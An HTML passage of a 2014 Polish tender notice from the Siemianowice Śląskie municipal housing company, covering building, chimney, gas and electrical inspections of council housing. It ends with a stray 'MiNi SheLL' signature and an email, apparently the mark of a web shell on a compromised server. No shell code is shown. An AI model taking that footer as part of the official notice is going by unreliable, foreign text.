<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Wzór umowy stanowi Dodatek nr 9 do Specyfikacji Istotnych Warunków Zamówienia.
Prowadzący postępowanie przewiduje możliwość następujących zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy:
-zmiany wynagrodzenia (brutto) Wykonawcy w przypadku ustawowej zmiany stawki podatku VAT na roboty budowlane będące przedmiotem zamówienia.
-zmiana podwykonawcy, w przypadku gdy w celu wykazania spełnienia warunków udziału w postępowaniu o udzielenie przedmiotowego zamówienia Wykonawca polegał na zasobach Podwykonawcy (wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia). Zmiana  Podwykonawcy jest dopuszczalna pod warunkiem, że nowy podwykonawca spełnia co najmniej takie warunki jak podano w Specyfikacji Istotnych Warunków Zamówienia dla przeprowadzonego postępowania, a Prowadzący postępowanie  na to podwykonawstwo wyraził zgodę
2.Zmiany umowy mogą zostać dokonane pod warunkiem przedłożenia Prowadzącemu postępowanie pisemnego uzasadnienia konieczności wprowadzenia zmian z przyczyn niezależnych od Wykonawcy oraz wyrażenia zgody przez Prowadzącego postępowanie na tę zmianę.
3.Wszystkie zmiany treści umowy wymagają zachowania formy pisemnej pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mpgkim.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MPGKiM Spółka z oo.o., ul.Śmiłowskiego 15, Zakład Remontów Kapitalnych- pokój nr 6 lub za zaliczeniem pocztowym,powcześniejszym złożeniu wniosku. Cena SIWZ 41,60 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.06.2014 godzina 09:00, miejsce: Sekretariat dyrekcji Miejskiego Przedsiębiorstwa Gospodarki Komunalnej i Mieszkaniowej  Sp. z o. o. ul. Śmiłowskiego 15 w Siemianowicach Śl..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie rocznej kontroli stanu technicznego budynków stanowiących zasób Gminy Siemianowice Śląskie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres kontroli obejmuje:
Wykonanie rocznej kontroli obejmującej sprawdzenie stanu technicznego elementów budynków narażonych na szkodliwe wpływy atmosferyczne i niszczące działania czynników występujących podczas użytkowania obiektu.
Przeglądy powinny zostać sporządzone na karcie przeglądu stanu użytkowej obiektu stanowiący dodatek nr 10/1 do SIWZ.
Wykaz budynków do wykonania przeglądów rocznych budowlanych na poszczególnych administracjach  stanowi  Dodatek nr 8/1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.61.00-9, 71.31.54.00-3, 71.70.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie kontroli obejmującej sprawdzenie stanu technicznego przewodów kominowych w budynkach stanowiących zasób Gminy Siemianowice Śląskie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac obejmuje:
1).sprawdzenie drożności  i szczelności przewodów kominowych,
2).sprawdzenie siły ciągu kominowego (ciśnienia) zapewniającego prawidłowe działanie podłączonych przewodów urządzeń dymowych, spalinowych i wentylacyjnych,
3).sprawdzenie czy występują uszkodzenia przewodów kominowych na całej ich długości, kanałów, czopuchów, rur i łączników, włazów, drabin, drzwiczek kominowych (rewizyjnych-wyciorowych), ław kominowych, nasad kominowych,
4).sprawdzenie czy występuje dogodny dostęp do czyszczenia i przeprowadzenia okresowych kontroli przewodów kominowych  i urządzeń mających związek z kominami,
5).sprawdzenie czy w pomieszczeniach w których zainstalowane są urządzenia grzewcze (trzony kuchenne, piecyki wody przepływowej, kotły CO itp.), posiadają sprawne działające urządzenia wentylacyjne w tym: nawiewne i wywiewne,
6).sprawdzenie czy występują inne stwierdzone w trakcie kontroli rażące nieprawidłowości (uchybienia) mogące spowodować zagrożenie bezpieczeństwa ludzi i mienia
7). Przed przystąpieniem do przeglądu Wykonawca po uzgodnieniu z Prowadzącym postępowanie wykona oraz rozwiesi ogłoszenia o konieczności udostępnienia przez lokatorów lokali mieszkalnych, w których powinna być przeprowadzona kontrola.
8). W razie nieobecności lokatorów w mieszkaniu czynności kontrolne należy ponowić do dwóch razy. Za trzecim razem należy zgłosić administracji informację o nieudanym wykonaniu kontroli w danym lokalu oraz przedłożyć wykaz osób wraz z terminem kolejnej kontroli. Administracja natomiast powiadomi lokatora listem poleconym o kolejnym terminie przeprowadzenia kontroli.
9). Wykonawcy przysługuje wynagrodzenie jedynie za faktycznie wykonane przeglądy,      tj. za wykonanie przeglądu po udostępnieniu przez lokatorów lokali mieszkalnych. Wykonawcy nie przysługuje wynagrodzenie za przegląd  w tych lokalach mieszkalnych w których kontroli z jakiejkolwiek przyczyny nie przeprowadzono, niezależnie od tego, czy Wykonawca pozostawał w gotowości wykonania takiego przeglądu. Wykonanie kontroli w lokalu mieszkalnym musi być potwierdzone czytelnym  podpisem lokatora złożonym na protokole kontroli.
Przeglądy powinny zostać sporządzone na  protokole z okresowej kontroli przewodów kominowych stanowiący dodatek nr 10/2 do SIWZ, w dwóch egzemplarzach (oryginału i kopii).
Wykaz budynków do wykonania przeglądów  kominiarskich na poszczególnych administracjach  stanowi Dodatek nr 8/2 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.61.00-9, 71.31.15.40-3, 71.70.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie kontroli obejmującej sprawdzenie stanu technicznego instalacji gazowych wraz       z wykonaniem prób szczelności w budynkach stanowiących zasób Gminy Siemianowice Śląskie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres kontroli obejmuje:
1.Wykonanie przeglądu instalacji gazowej od kurka głównego do urządzeń gazowych,
2.Wykonanie prób szczelności instalacji gazowej za gazomierzem - w lokalach mieszkalnych i użytkowych  w danym budynku,
3.Wykonanie kontroli obejmującej sprawdzenie stanu technicznego instalacji gazowej w lokalach mieszkalnych w których został odcięty dopływ gazu (bez uszczelnienia
4.Wykonanie próby szczelności instalacji gazowej przed gazomierzem w budynku mieszkalnym (część wspólnych instalacji- od kurka głównego do gazomierza):
-w przypadku stwierdzenia nieszczelności instalacji wewnętrznej gazu w lokalu mieszkalnym należy umówić się z lokatorem na termin i wykonać jej uszczelnienia wraz z ewentualną konieczną wymianą niezbędnych elementów instalacji tj. zawory, kształtki, podejścia zgodnie z istniejącymi średnicami.
-w przypadku stwierdzenia nieszczelności przy gazomierzu należy wykonać uszczelnienie instalacji do 48 godzin od stwierdzenia nieszczelności. Koszty związane z demontażem i montażem gazomierza ponosi Prowadzący Postępowanie.
-w przypadku stwierdzenia nieszczelności urządzeń odbiorczych w lokalu mieszkalnym takich jak kuchenka 4-palnikowa, przepływowe podgrzewacze wody i piece c.o. należy odciąć przy urządzeniu dopływ gazu na zaworze. Naprawa lub wymiana w/w urządzenia należy do obowiązków lokatora.
-w przypadku stwierdzenia nieszczelności instalacji części wspólnych tj. poziomów i pionów budynku mieszkalnego należy wykonać ich uszczelnienie do 48 godzin od stwierdzenia nieszczelności. 
-w przypadku stwierdzenia wymiany odcinka rur w związku ze złym stanem technicznym  (tj. korozja, pęknięcia) należy powiadomić Prowadzącego postępowanie odrębnym protokołem. Wymiana odcinka rur  należy do obowiązków Prowadzącego Postępowanie. 
-w przypadku stwierdzenia nieszczelności zagrażającej zdrowiu i życiu ludzi należy natychmiastowo odciąć dopływ gazu bądź usunąć nieszczelność.
5.Przed przystąpieniem do przeglądu Wykonawca po uzgodnieniu z Prowadzącym postępowanie wykona oraz rozwiesi ogłoszenia o konieczności udostępnienia przez lokatorów lokali mieszkalnych, w których powinna być przeprowadzona kontrola.
6.W razie nieobecności lokatorów w mieszkaniu czynności kontrolne należy ponowić do dwóch razy. Za trzecim razem należy zgłosić administracji informację o nieudanym wykonaniu kontroli w danym lokalu oraz przedłożyć wykaz osób wraz z terminem kolejnej kontroli. Administracja natomiast powiadomi lokatora listem poleconym o kolejnym terminie przeprowadzenia kontroli
7.Wykonawcy przysługuje wynagrodzenie jedynie za faktycznie wykonane przeglądy,      tj. za wykonanie przeglądu po udostępnieniu przez lokatorów lokali mieszkalnych. Wykonawcy nie przysługuje wynagrodzenie za przegląd  w tych lokalach mieszkalnych w których kontroli z jakiejkolwiek przyczyny nie przeprowadzono, niezależnie od tego, czy Wykonawca pozostawał w gotowości wykonania takiego przeglądu. Wykonanie kontroli w lokalu mieszkalnym musi być potwierdzone czytelnym  podpisem lokatora złożonym na protokole kontroli.
8.Prowadzący postępowanie nie ponosi żadnej odpowiedzialności jeżeli przeglądy będą mogły być wykonane jedynie w części lokali wskazanych w Dodatku 8/3 do SIWZ. Wykonawcy przysługuje wynagrodzenie jedynie za faktycznie wykonane przeglądy, tj. za wykonanie przeglądu po udostępnieniu przez lokatorów lokali mieszkalnych. Wykonawcy nie przysługuje wynagrodzenie za przegląd instalacji w tych lokalach mieszkalnych, w których kontroli z jakiejkolwiek przyczyny nie przeprowadzono, niezależnie od tego, czy Wykonawca pozostawał w gotowości wykonania takiego przeglądu.
Przeglądy powinny zostać sporządzone na protokole przeglądu instalacji gazowej stanowiący dodatek nr 10/3 do SIWZ, w dwóch egzemplarzach (oryginału i kopii).
Wykaz budynków do wykonania przeglądów gazowych na poszczególnych administracjach   stanowi Dodatek nr 8/3 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.61.00-9, 71.31.54.00-3, 71.70.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wykonanie pięcioletniej kontroli obejmującej badanie instalacji elektrycznej i piorunochronnej w zakresie stanu sprawności połączeń, osprzętu, zabezpieczeń i środków ochrony od porażeń, oporności izolacji przewodów oraz uziemień instalacji i aparatów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres kontroli obejmuje: 
1.Kontrolę instalacji elektrycznej w lokalach mieszkalnych, 
2.Kontrolę instalacji elektrycznej oświetlenia administracyjnego ( klatka schodowa, strych, piwnice, pomieszczenia WC poza lokalem),
3.Kontrolę instalacji elektrycznej wewnętrznej linii zasilającej (wlz) w klatce schodowej, 
4.Kontrolę instalacji piorunochronnej obiektu (budynku) zgodnie z wymogami normy PN-ICE 61024-1 ochrona odgromowa obiektów. 
5.Oględziny w zakresie ochrony przed dotykiem bezpośrednim i ochrony przeciwpożarowej, pomiary rezystancji izolacji, 
6.Badanie ciągłości przewodów ochronnych, badania przed dotykiem pośrednim, próby działania urządzeń różnicowoprądowych, 
7.Kontrolę instalacji elektrycznej w lokalach mieszkalnych, tablic elektrycznych w mieszkaniach, sprawdzenie stanu technicznego wkładek topikowych lub wyłączników nadmiaromo-prądowych i wyłączników różnicoprądowych, 
8.Sprawdzenie tablic licznikowych i licznika, sprawdzenie stanu gniazdek wtyczkowych i wyłączników, ciągłość przewodów ochronnych w tym połączeń wyrównawczych.
9.Przed przystąpieniem do przeglądu Wykonawca po uzgodnieniu z Prowadzącym postępowanie wykona oraz rozwiesi ogłoszenia o konieczności udostępnienia przez lokatorów lokali mieszkalnych, w których powinna być przeprowadzona kontrola.
10.W razie nieobecności lokatorów w mieszkaniu czynności kontrolne należy ponowić do dwóch razy. Za trzecim razem należy zgłosić administracji informację o nieudanym wykonaniu kontroli w danym lokalu oraz przedłożyć wykaz osób wraz z terminem kolejnej kontroli. Administracja natomiast powiadomi lokatora listem poleconym o kolejnym terminie przeprowadzenia kontroli.
11.Wykonawcy przysługuje wynagrodzenie jedynie za faktycznie wykonane przeglądy, tj. za wykonanie przeglądu po udostępnieniu przez lokatorów lokali mieszkalnych. Wykonawcy nie przysługuje wynagrodzenie za przegląd  w tych lokalach mieszkalnych w których kontroli z jakiejkolwiek przyczyny nie przeprowadzono, niezależnie od tego, czy Wykonawca pozostawał w gotowości wykonania takiego przeglądu. Wykonanie kontroli w lokalu mieszkalnym musi być potwierdzone czytelnym  podpisem lokatora złożonym na protokole kontroli.
12.Prowadzący postępowanie nie ponosi żadnej odpowiedzialności jeżeli przeglądy będą mogły być wykonane jedynie w części lokali wskazanych w Dodatku 8/4 do SIWZ. Wykonawcy przysługuje wynagrodzenie jedynie za faktycznie wykonane przeglądy, tj. za wykonanie przeglądu po udostępnieniu przez lokatorów lokali mieszkalnych. Wykonawcy nie przysługuje wynagrodzenie za przegląd instalacji w tych lokalach mieszkalnych, w których kontroli z jakiejkolwiek przyczyny nie przeprowadzono, niezależnie od tego, czy Wykonawca pozostawał w gotowości wykonania takiego przeglądu.
13.Przeprowadzenie w/w kontroli ma na celu sprawdzenie czy w trakcie eksploatacji stan techniczny instalacji lub urządzeń elektrycznych nie uległ pogorszeniu w stopniu stwarzającym zagrożenie dla ich dalszego bezpiecznego użytkowania, oraz czy ich dalsze  użytkowanie zapewnia ochronę interesów użytkowników innych lokali korzystających z tej instalacji oraz osób trzecich.
Przeglądy powinny zostać sporządzone na protokołach przeglądu instalacji elektrycznej stanowiący dodatek nr 10/4 do SIWZ, w dwóch egzemplarzach (oryginału i kopii).
Wykaz budynków do wykonania przeglądów pięcioletnich elektrycznych na poszczególnych administracjach   stanowi Dodatek nr 8/4 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.61.00-9, 71.31.54.00-3, 71.70.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com